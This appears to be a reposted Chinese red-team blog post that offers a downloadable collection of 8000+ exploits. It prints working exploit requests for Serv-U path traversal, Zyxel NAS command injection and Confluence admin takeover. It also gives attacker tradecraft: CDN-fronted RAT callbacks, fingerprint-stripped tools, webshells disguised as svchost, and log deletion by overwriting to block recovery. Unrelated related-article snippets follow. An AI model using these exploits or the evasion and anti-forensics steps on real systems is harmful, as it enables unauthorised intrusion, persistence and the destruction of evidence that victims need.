2024HVV最新POC/EXP,目前有8000+個POC/EXP

7e6880914ee4e2f593d8c3c25c2c81f3.gif

點擊"仙網攻城獅”關注我們哦~

不當想研發的滲透人不是好運維a0c78db9e742f19ceca6f0215a260b9c.png

讓我們每天進步一點點

簡介

都是網上收集的POC和EXP,最新收集時間是2024年五月,需要的自取。

表里沒有的可以翻翻之前的文章,資源比較零散沒有整合起來。

文件鏈接:

https://pan.baidu.com/s/1OiyRctbpROh5AZO0SJ9kzQ?pwd=6666

其他資源失效了請給我留言

3a34fd7c562293a342fefb53a3248beb.png

實戰

CVE-2024-28995 Serv-U

EXP
curl -i -k --path-as-is https://192.168.86.43/?InternalDir=\..\..\..\..\etc^&InternalFile=passwd
文章連接:https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis

CVE-2024-37032 開源AI模型 Ollama 遠程代碼執行漏洞

POC:http://[victim]:11434/api/pull
文章連接:https://www.wiz.io/blog/probllama-ollama-vulnerability-cve-2024-37032

CVE-2024-29972 – NsaRescueAngel后門賬戶

POC:ip后面直接添加
/cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi CGIGetExtStoInfo None) and False or __import__('subprocess').check_output('id', shell=True)%23信息泄露
POST /cmd,/simZysh/register_main/setCookie HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHHaZAYecVOf5sfa6------WebKitFormBoundaryHHaZAYecVOf5sfa6Content-Disposition: form-data; name="c0"
storage_ext_cgi CGIGetExtStoInfo None) and False or __import__("subprocess").check_output("id", shell=True)#------WebKitFormBoundaryHHaZAYecVOf5sfa6--

CVE-2023-22515-Atlassian Confluence Data Center 權限管理不當

EXPGET /server-info.action?BootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1
Host: localhost:8090
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
X-Atlassian-Token: no-check在進行覆蓋 setupComplete=false 之后重新注冊管理員POST /setup/setupadministrator.action HTTP/1.1
Host:127.0.0.1:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
X-Atlassian-Token: no-check
Content-Length: 122
Content-Type: application/x-www-form-urlencodedusername=elk&fullName=elk&email=elk@qq.comt&password=elk&confirm=elk&setup-next-button=Next

祝各位HVV順利

工作環境

  • 工作時全部操作均在虛擬機中完成

  • 虛擬機中不登陸個人賬號,如QQ、微信、網盤、CSDN等

  • 滲透環境、開發環境、調試環境需要分開,從目標服務器上下載的程序需要在單獨的環境中測試運行

  • 滲透虛擬機中全程使用代理IP上網

  • 物理機必須安裝安全防護軟件,并安裝最新補丁,卸載與公司相關的特定軟件

  • fofa、cmd5、天眼查等第三方工具平臺賬號密碼不得與公司有關,云協作平臺同理

  • RAT使用CDN保護的域名上線

  • 盡量不使用公司網絡出口,可以使用移動4G網卡,然后虛擬機再鏈代理

滲透工具

  • WebShell不能使用普通一句話木馬,連接端使用加密流量,建議使用蟻劍

  • 不使用默認冰蝎,需要修改為硬編碼密鑰

  • 內網滲透時盡量使用socks代理,在本地操作

  • 上傳程序到目標服務器時,需要修改文件名:如svchost等,盡量不上傳內部自研工具

  • 公開工具需要去除特征指紋,如:sqlmap、masscan、Beacon證書

  • 工具需要設置線程或訪問頻率,如sqlmap的--delay、內網掃描時線程不大于5

  • Cobalt Strike后?上線后,設置time.sleep?于500秒

  • 手機短信驗證碼需使用在線平臺如z-sms.com

  • socks代理通道需要使用SSL加密

重點

  • 攻防演習成功的關鍵是團隊協作,要互相幫助學習和進步,不要勾心斗角,每個團隊的成功都需要有人當紅花有人當綠葉的,外網打點與內網滲透同等重要

  • 滲透過程中,記住上傳的webshell、木馬等地址,服務器添加的賬號,項目結束后要刪除或描述在報告中,避免不必要的麻煩

  • 登陸3389不建議添加用戶,嘗試激活guest,如必須要添加賬號,賬號名與目標相關即可,避免使用qax、qaxNB等友商關鍵詞

  • 清理日志時需要以文件覆蓋的方式刪除文件,防止數據恢復,或者僅刪除指定ID的日志

  • 碰到蜜罐就不要慌,多喝點花茶,這樣嘎了會比較香

往期內容

2023HW-8月(10-15)53個0day,1day漏洞匯總含POC、EXP

Stable DiffusionAI繪畫一鍵啟動整合包

能讓你躺著挖洞的BurpSuite插件

25acd99b0ea666233f15bfc2ec6c5194.gif

54298327cefc95680dcf38f079fecc60.gif

更多資訊長按二維碼 關注我們

? ?專業的信息安全團隊,給你最安全的保障。定期推送黑客知識和網絡安全知識文章,讓各位了解黑客的世界,學習黑客知識,普及安全知識,提高安全意識。

覺得不錯點個“贊”唄ce4b1f9647845c78bbb5e44935c9fb82.png? ? ??

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/diannao/37524.shtml
繁體地址,請注明出處:http://hk.pswp.cn/diannao/37524.shtml
英文地址,請注明出處:http://en.pswp.cn/diannao/37524.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

hexo博客搭建

系列文章目錄 文章目錄 系列文章目錄前言1. 環境配置2. 打包并發布到github倉庫3. 生成ssh秘鑰4.vscode配置本地與遠端相對路徑不一致問題總結 前言 本文主要介紹了hexo博客怎么搭建 1. 環境配置 安裝git、nodejs、npm創建博客文件夾blogcmd輸入命令npm install -g hexo初始化…

10波形震蕩原因及采集設備安裝視頻

10波形震蕩原因及采集設備安裝視頻 排查過程算法軟件后臺解碼計算嵌入式采集設備準備視頻 結語其他以下是廢話 之前說過:“解決不了的真的就不是我這邊能解決的了”,這是因為我們充分排查了自身,那么問題出在哪里呢? 不愿溝通、不…

Spring Boot 全面解析:從入門到實踐案例

引言: Spring Boot 是由 Pivotal 團隊提供的全新框架,旨在簡化 Spring 應用的初始搭建以及開發過程。它基于 Spring 平臺,通過“約定優于配置”的原則,盡可能自動化配置,減少XML配置,使得開發者能夠快速啟…

矢量數據庫:概念、歷史、現狀與展望?

矢量數據庫:概念、歷史、現狀與展望? 李升偉 概念:矢量數據庫是一種專門用于存儲、檢索和搜索矢量的數據庫。在數據科學和機器學習中,矢量是表示數據的有序列表或數字序列,可以表示各種類型的數據,如文本…

阿里云智能編程助手的安裝使用

https://help.aliyun.com/document_detail/2590613.html 通義靈碼,是阿里云出品的一款基于通義大模型的智能編碼輔助工具,提供行級/函數級實時續寫、自然語言生成代碼、單元測試生成、代碼優化、注釋生成、代碼解釋、研發智能問答、異常報錯排查等能力&a…

前后端防重復提交

數據重復提交是一個大忌,會帶來無效數據,應該在前端和后端都建議檢測防范。 前端一般是按鈕按下觸發數據提交,如果用戶鼠標操作習慣不好,或者鼠標或系統設置問題會導致鼠標連擊,如果前端不做相關處理,可能會…

洞察數據資產的奧秘:深入剖析數據資產在企業運營中的核心作用,提出一套全面、系統的數據資產解決方案,幫助企業實現數據資產的最大化利用和增值

一、引言 在數字化浪潮洶涌的今天,數據已成為企業最寶貴的資產之一。數據資產不僅記錄了企業的歷史運營軌跡,更蘊含著指導未來決策的智慧。然而,如何有效管理、利用這些數據資產,使其轉化為企業的競爭優勢和利潤增長點&#xff0…

Vue3-04_組件基礎_下

props驗證 指的是在封裝組件時對外界傳遞過來的 props 數據進行合法性的校驗,從而防止數據不合法的問題。 使用數組類型的 props 節點的缺點是無法為每個 prop 指定具體的數據類型。 使用對象類型的 props 節點,可以對每個 prop 進行數據類型的校驗&am…

【云服務-5】Elasticsearch

Elasticsearch是什么?和大數據的關系? Elasticsearch 是一個分布式、開源的搜索和分析引擎,建立在 Apache Lucene 庫之上。它的主要特點包括: (1)快速、可擴展的搜索和分析能力 (2)支持多租戶和高可用性 …

python--基礎篇--正則表達式--py腳本--題目解答

文章目錄 驗證輸入用戶名和QQ號是否有效并給出對應的提示信息從一段文字中提取出國內手機號碼替換字符串中的不良內容拆分長字符串 驗證輸入用戶名和QQ號是否有效并給出對應的提示信息 """ 驗證輸入用戶名和QQ號是否有效并給出對應的提示信息要求:用…

常用數據庫簡單介紹

1. MySQL 優勢: 開源和免費:MySQL 是一個開源數據庫,擁有龐大的社區支持,易于獲取和使用。性能優秀:對于中小型項目,MySQL 提供了高效的性能和響應速度。跨平臺支持:MySQL 可以在各種操作系統…

扎克伯格抨擊閉源人工智能競爭對手試圖“創造上帝”

Meta 首席執行官馬克-扎克伯格(Mark Zuckerberg)在周四發表的一篇訪談中談到了他對人工智能未來的看法,他深信"不會只有一種人工智能"。扎克伯格強調了開源的價值,即把人工智能工具交到許多人手中,他還不忘貶…

抖音微短劇小程序源碼搭建:實現巨量廣告數據高效回傳

在數字化營銷日益盛行的今天,抖音微短劇小程序已成為品牌與觀眾互動的新渠道。這些短小精悍的劇目不僅能迅速抓住用戶的注意力,還能有效提升品牌的知名度和用戶黏性。然而,想要充分利用這一營銷工具,關鍵在于如何高效地追蹤廣告數…

堆的 shift down

堆的 shift down 堆(Heap)是一種特殊的完全二叉樹,它通常用于實現優先隊列。在堆中,每個節點的值都大于或等于(在最大堆中)或小于或等于(在最小堆中)其子節點的值。堆的操作包括插入元素(shift up)和刪除元素(shift down 或 bubble down)。 本文將重點介紹堆的 s…

HDFS EC文件損壞恢復方法

HDFS EC低版本存在許多bug,導致文件損壞,這些bug是在一定的條件下才有機率性的錯誤重構。 我們當前版本是3.1.1,使用前已修復部署EC patch了,但還是損壞了文件,而且這些文件是無任何提示異常的。是在進行讀數據的時候…

從0開始學習pyspark--pyspark的啟動模式[第1節]

PySpark是Apache Spark的Python API,它能夠在分布式計算環境中處理大規模數據。PySpark可以在幾種不同的模式下運行,主要包括以下三種: 本地模式(Local Mode)集群模式(Cluster Mode)客戶端模式…

springboot中使用springboot cache

前言&#xff1a;SpringBoot中使用Cache緩存可以提高對緩存的開發效率 此圖片是SpringBootCache常用注解 Springboot Cache中常用注解 第一步&#xff1a;引入依賴 <!--緩存--><dependency><groupId>org.springframework.boot</groupId><artifactId…

使用ExpandableListView創建可擴展列表

使用ExpandableListView創建可擴展列表 大家好&#xff0c;我是免費搭建查券返利機器人省錢賺傭金就用微賺淘客系統3.0的小編&#xff0c;也是冬天不穿秋褲&#xff0c;天冷也要風度的程序猿&#xff01;今天我們將深入探討如何使用Android中的ExpandableListView創建可擴展列…

【linux】gcc快速入門教程

目錄 一.gcc簡介 二.gcc常用命令 一.gcc簡介 gcc 是GNU Compiler Collection&#xff08;GNU編譯器套件&#xff09;。就是一個編譯器。編譯一個源文件的時候可以直接使用&#xff0c;但是源文件數量太多時&#xff0c;就很不方便&#xff0c;于是就出現了make 工具 二.gcc…

vue實現鼠標拖動元素把二級分組放入一級分組

拖動案例demo實現 <template><div><div class"group one-level"><divclass"group-item"v-for"(group, index) in groups":key"group.id"draggable"true"dragstart"dragStart(group, $event)"…